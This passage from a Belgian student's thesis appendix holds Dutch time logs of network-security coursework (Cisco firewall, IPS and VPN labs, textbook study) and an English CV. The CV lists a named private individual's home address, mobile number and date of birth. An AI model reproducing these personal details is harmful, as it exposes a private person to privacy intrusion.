20/jan 19.00 u. 22.10 u. 3.10 u. 290.00 u. Alles in een document plaatsen Thuis 21/jan 9.10 u. 11.30 u. 2.20 u. 292.20 u. Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …
Thuis 21/jan 12.10 u. 18.30 u. 6.20 u. 298.40 u.
Bijkomende zaken maken, onderandere bibliografie, inhoudstafel, enz …
Thuis 21/jan 19.00 u. 21.00 u. 2.00 u. 300.40 u.
Omzetten naar PDF formaat Thuis 22/jan 9.20 u. 10.10 u. 0.50 u. 301.30 u. Laten afprinten Halle 22/jan 16.00 u. 17.20 u. 1.20 u. 302.50 u. Totaal aantal gespendeerde uren: 302.50 u.
143
© Nathan Boone
2 Tijdstabel Netwerk Security Tijdstabel Nathan Boone
Tijbesteding Plaats Dag Beginuur Einduur Gespendeerde uren Totaal uren Uitleg gekregen over Cisco Configuration Professional (CCP)
School 2/okt 18.00 u. 20.00 u. 2.00 u. 2.00 u.
CCP uitgeprobeert maar mislukt School 3/okt 18.00 u. 20.00 u. 2.00 u. 4.00 u.
CCP geconfigureert en gelukt School 9/okt 18.00 u. 20.00 u. 2.00 u. 6.00 u.
Uitleg gekregen over IPv6 School 10/okt 18.00 u. 19.15 u. 1.15 u. 7.15 u.
Portfolio Netwerksecurity: CCP Thuis 11/okt 10.00 u. 11.30 u. 1.30 u. 8.45 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 11/okt 14.00 u. 15.00 u. 1.00 u. 9.45 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 14/okt 18.00 u. 19.15 u. 1.15 u. 11.00 u.
Portfolio Netwerksecurity: Lab2 Researching Network Attacks and Security Audit Tools
School 16/okt 18.00 u. 19.15 u. 1.15 u. 12.15 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 17/okt 20.00 u. 22.00 u. 2.00 u. 14.15 u.
Uitleg gekregen over verschillende VPN's en een site to site VPN ingesteld met Menr Rooseleer
School 23/okt 18.00 u. 20.00 u. 2.00 u. 16.15 u.
Uitleg gekregen over verschillende soorten Firewall's
School 24/okt 18.00 u. 19.15 u. 1.15 u. 17.30 u.
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 6/nov 18.00 u. 19.15 u. 1.15 u. 18.45 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 7/nov 10.00 u. 11.00 u. 1.00 u. 19.45 u.
144
© Nathan Boone
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 7/nov 18.00 u. 20.25 u. 2.25 u. 22.10 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
Thuis 7/nov 21.45 u. 22.30 u. 0.45 u. 22.55 u.
Maken van labo: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 13/nov 18.00 u. 19.15 u. 1.15 u. 24.10 u.
Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall
School 20/nov 18.00 u. 19.15 u. 1.15 u. 25.25 u.
Maken van labo: Chapter 4 lab A: CBA and Zone Based Firewall
School 21/nov 11.00 u. 13.00 u. 2.00 u. 27.25 u.
Portfolio Netwerksecurity: Chapter 3 lab A: Securing Administratice Access Using AAA and Radius
School 21/nov 18.00 u. 20.15 u. 2.15 u. 29.40 u.
Examen chapter1 : Implementing Network Security Thuis 26/nov 11.10 u. 11.40 u. 0.30 u. 30.10 u.
Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI
School 27/nov 16.00 u. 18.00 u. 2.00 u. 32.10 u.
Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI
School 28/nov 18.00 u. 19.15 u. 1.15 u. 33.25 u.
Maken van labo: Chapter 6 lab A: Securing layer 2 switches
School 3/dec 15.00 u. 18.00 u. 3.00 u. 36.25 u.
Maken van labo: Chapter 7 lab A: Exploring encryption methods
School 4/dec 12.00 u. 13.00 u. 1.00 u. 37.25 u.
Maken van labo: Chapter 8 lab A: Configuring Site-to-site VPN using Cisco IOS
School 4/dec 14.00 u. 16.00 u. 2.00 u. 39.25 u.
Maken van labo: Chapter 8 lab B: Configuring Remote Access VPN Server and Client
School 4/dec 16.00 u. 18.30 u. 2.30 u. 41.55 u.
Maken van labo: Chatper 8 lab C: Configuring a Remote Accesss VPN Server and Client
School 5/dec 10.00 u. 13.00 u. 3.00 u. 44.55 u.
145
© Nathan Boone
Configureren van Access Point 1200 en Security instellen
School 5/dec 14.30 u. 17.30 u. 3.00 u. 47.55 u.
Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI
School 5/dec 17.30 u. 18.00 u. 0.30 u. 48.25 u.
Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI
School 6/dec 10.00 u. 12.30 u. 2.30 u. 50.55 u.
Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM
Schol 6/dec 13.20 u. 14.40 u. 1.20 u. 52.15 u.
Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM
School 6/dec 15.40 u. 17.15 u. 1.35 u. 53.50 u.
Leren van hoofdstuk 1: Networking Security Consepts
Thuis 7/dec 11.10 u. 12.00 u. 0.50 u. 54.40 u.
Leren van hoofdstuk 2: Understanding Security Policies Using a Lifecyce Approach
Thuis 7/dec 14.00 u. 14.50 u. 0.50 u. 55.30 u.
Leren van hoofdstuk 3: Building a Security Strategy Thuis 7/dec 15.00 u. 16.10 u. 1.10 u. 56.40 u.
Leren van hoofdstuk 4: Network Foundation Protection
Thuis 7/dec 16.15 u. 17.30 u. 1.15 u. 57.55 u.
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 8/dec 17.00 u. 17.30 u. 0.30 u. 58.25 u.
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 9/dec 11.15 u. 11.40 u. 0.25 u. 58.50 u.
Maken van labo: Chapter 10 lab C: Configuring Clientless and ANyConnect Remote Access SSL VPN's Using ASDM
School 9/dec 14.30 u. 17.10 u. 2.40 u. 61.30 u.
Maken van labo: Chapter 10 lab D: Configuring a Site-to-Site Ipsec VPN Using CCP and ASDM
School 9/dec 17.15 u. 18.00 u. 0.45 u. 62.15 u.
Maken van labo: Chatper 2 Securing the Router for Administratice Access
School 9/dec 18.00 u. 19.20 u. 1.20 u. 63.35 u.
146
© Nathan Boone
Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture
Thuis 9/dec 21.10 u. 21.35 u. 0.25 u. 64.00 u.
Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices
Thuis 9/dec 22.00 u. 23.10 u. 1.10 u. 65.10 u.
Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices
Thuis 10/dec 9.10 u. 9.30 u. 0.20 u. 65.30 u.
Leren van hoofdstuk 7: Implementing AAA Using IOS and the ACS Server
Thuis 10/dec 10.00 u. 11.30 u. 1.30 u. 67.00 u.
Examen chapter 2: Implementing Network Security Thuis 10/dec 12.00 u. 12.30 u. 0.30 u. 67.30 u.
Examen chapter 3: Implementing Network Security Thuis 10/dec 13.15 u. 13.45 u. 0.30 u. 68.00 u.
Leren van hoofdstuk 8: Securing Layer 2 Technologies
Thuis 10/dec 14.00 u. 15.00 u. 1.00 u. 69.00 u.
Leren van hoofdstuk 8: Securing Layer 2 Technologies
Thuis 10/dec 16.00 u. 16.45 u. 0.45 u. 69.45 u.
Leren van hoofdstuk 9: Securing the Data Plane in IPv6
Trein 11/dec 8.00 u. 8.40 u. 0.40 u. 70.25 u.
Leren van hoofdstuk 9: Securing the Data Plane in IPv6
Thuis 11/dec 12.00 u. 13.00 u. 1.00 u. 71.25 u.
Leren van hoofdstuk 10: Planning a Threat Control Strategy
Thuis 11/dec 15.00 u. 16.15 u. 1.15 u. 72.40 u.
Leren van hoofdstuk 11: Using Access Control Lists for Threat Mititgation
Thuis 11/dec 16.30 u. 18.00 u. 1.30 u. 74.10 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
Thuis 11/dec 19.50 u. 20.30 u. 0.40 u. 74.50 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
School 12/dec 10.50 u. 11.20 u. 0.30 u. 75.20 u.
147
© Nathan Boone
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
School 12/dec 14.00 u. 16.00 u. 2.00 u. 77.20 u.
Leren van hoofdstuk 12: Understanding Firewall Fundamentals
Thuis 12/dec 19.50 u. 20.30 u. 0.40 u. 78.00 u.
Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls
Thuis 12/dec 20.30 u. 21.30 u. 1.00 u. 79.00 u.
Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls
Thuis 13/dec 11.30 u. 12.10 u. 0.40 u. 79.40 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Thuis 13/dec 13.50 u. 14.30 u. 0.40 u. 80.20 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Bus 14/dec 12.10 u. 13.00 u. 0.50 u. 81.10 u.
Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA
Thuis 15/dec 11.00 u. 11.30 u. 0.30 u. 81.40 u.
Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals
Thuis 15/dec 14.10 u. 15.20 u. 1.10 u. 82.50 u.
Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals
Trein 16/dec 12.00 u. 12.30 u. 0.30 u. 83.20 u.
Leren van hoofdstuk 16: Implementing IOS-Based IPS
Trein 16/dec 12.30 u. 12.40 u. 0.10 u. 83.30 u.
Leren van hoofdstuk 16: Implementing IOS-Based IPS
Thuis 16/dec 13.00 u. 14.00 u. 1.00 u. 84.30 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 14.10 u. 14.30 u. 0.20 u. 84.50 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 15.10 u. 16.00 u. 0.50 u. 85.40 u.
Leren van hoofdstuk 17: Fundamentals of VPN Technology
Thuis 16/dec 17.00 u. 18.10 u. 1.10 u. 86.50 u.
148
© Nathan Boone
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 10.00 u. 10.30 u. 0.30 u. 87.20 u.
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 11.00 u. 12.10 u. 1.10 u. 88.30 u.
Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure
Thuis 17/dec 14.20 u. 15.10 u. 0.50 u. 89.20 u.
Leren van hoofdstuk 19: Fundamentals of IP Security
Thuis 17/dec 16.00 u. 16.20 u. 0.20 u. 89.40 u.
Leren van hoofdstuk 19: Fundamentals of IP Security
Thuis 17/dec 16.30 u. 17.00 u. 0.30 u. 90.10 u.
Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's
Thuis 17/dec 17.20 u. 18.30 u. 1.10 u. 91.20 u.
Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's
Thuis 17/dec 19.10 u. 20.30 u. 1.20 u. 92.40 u.
Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA
Thuis 18/dec 9.10 u. 10.20 u. 1.10 u. 93.50 u.
Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA
Thuis 18/dec 10.30 u. 11.10 u. 0.40 u. 94.30 u.
Totaal aantal gespendeerde uren 94.30 u.
149
© Nathan Boone
Curriculum vitae Nathan Boone Name: Nathan Boone Address: Moensberg 93 Place of residence: 1180 UKKEL Country: Belgium Cellphone: +32 479 76 29 77 E-mail: [email protected] Date of birth: 25/12/1993 Driver license: B
EDUCATION Postgraduate Degree Program ICT Infrastructure & Network Management University College Brussels Odisee, 2014-2015. Bachelor of Applied Informatics (specialized in computer networks and infrastructure) University College Brussels Odisee, 2011-2014. Internship about networking in the Fachhochschule Salzburg University of Applied Sciences, February 2014 - June 2014. Secondary school Onze-Lieve-Vrouw instituut Sint-Genesius-Rode economics/commerce degree obtained in June 2011. Certifications Cisco CCENT Preparing for Cisco CCNA Main modules studied so far Computer networks:
• Courses o Cisco Discovery 1 Networking for Home and Small Businesses o Cisco Discovery 2 Working at a Small-to-Medium Business o Cisco Discovery 3 Introducing Routing and Switching in the Enterprise o Cisco Discovery 4 Designing and Supporting Computer Networks o Interconnection Cisco Network Devices 1 o Interconnecting Cisco Network Devices 2 o CCNA Network Security o Corning course on fibre networks
Computer infrastructure:
• VMware System virtualization • Linux
o Created a server park o Bash Scripting
• Windows o Windows Server 2008 R2
Basic knowledge of the following subjects: • Transact SQL • SQL Server Management Studio • Oracle SQL • Oracle Apex • HTML • CSS
150
© Nathan Boone
• JavaScript • C#
LANGUAGE SKILLS Speaking Writing Listening Dutch Native Speaker Native Speaker Native Speaker English Excellent Excellent Excellent French Good Good Excellent German Fair Fair Fair Korean: learning since January 2015 PROJECTS Universtity College Brussels Odisee I designed and configured the network for the Super Hackathon in Brussels. This is an all-day lasting event where people come together to develop applications for Windows 8. This event was organized by Microsoft in the University College Brussels. For my bachelor thesis, I studied the book Hacking Exposed 7: Network Security Secrets & Solutions. I first made a summarization of the most interesting subjects of this book. I learned how to analyze a big amount of data and how to take the most interesting subjects out of there. I made cases and then I designed and configured networks in a test environment to test these cases. For my Postgraduate Program we designed and installed the backbone fibre network of a school of more than 600 students. Fachhochschule Salzburg University of Applied Sciences The following projects were requested by Professor Dominik Engel at the Fachhochschule Salzburg University of Applied Sciences:
• VoIP and VoIP Security project: I investigated the different protocols that are being used inside a VoIP network. I designed and made a VoIP network while taking care about the redundancy, availability and security.
• Virtual Private Networks project at my Internship: I researched the different virtual private networks and designed a network where they are used in.
Cisco Networking Academy I was a reporter at the Wings for Life World Run for Cisco Networking Academy in May 2014. I reported about all the technical information from behind the scenes at the Wings for Life World Run Control Center. Vandenborre Vandenborre is a Belgian retailer in electronic equipment. I tested and reported about three different devices that would change their whole business perspective, from September 2014 until December 2014. EXTRACURRICULAR ACTIVITIES
• French communication skills: I worked as a monitor for young children at various playgrounds in the summer vacation at 2009. I improved my French communication skills and also learned the importance of team skills.
• Founded a commercial import company for a school project. We imported and sold
champagne to local companies and individuals.
• Sports: tennis and football, this helps to work in a team, to persevere and to be ambitious.
151
© Nathan Boone
De presentatie
152
© Nathan Boone
153
© Nathan Boone
154
© Nathan Boone
155
© Nathan Boone
156
© Nathan Boone
157
© Nathan Boone
158
© Nathan Boone
159
© Nathan Boone
160
© Nathan Boone
161
© Nathan Boone
162
© Nathan Boone
163
© Nathan Boone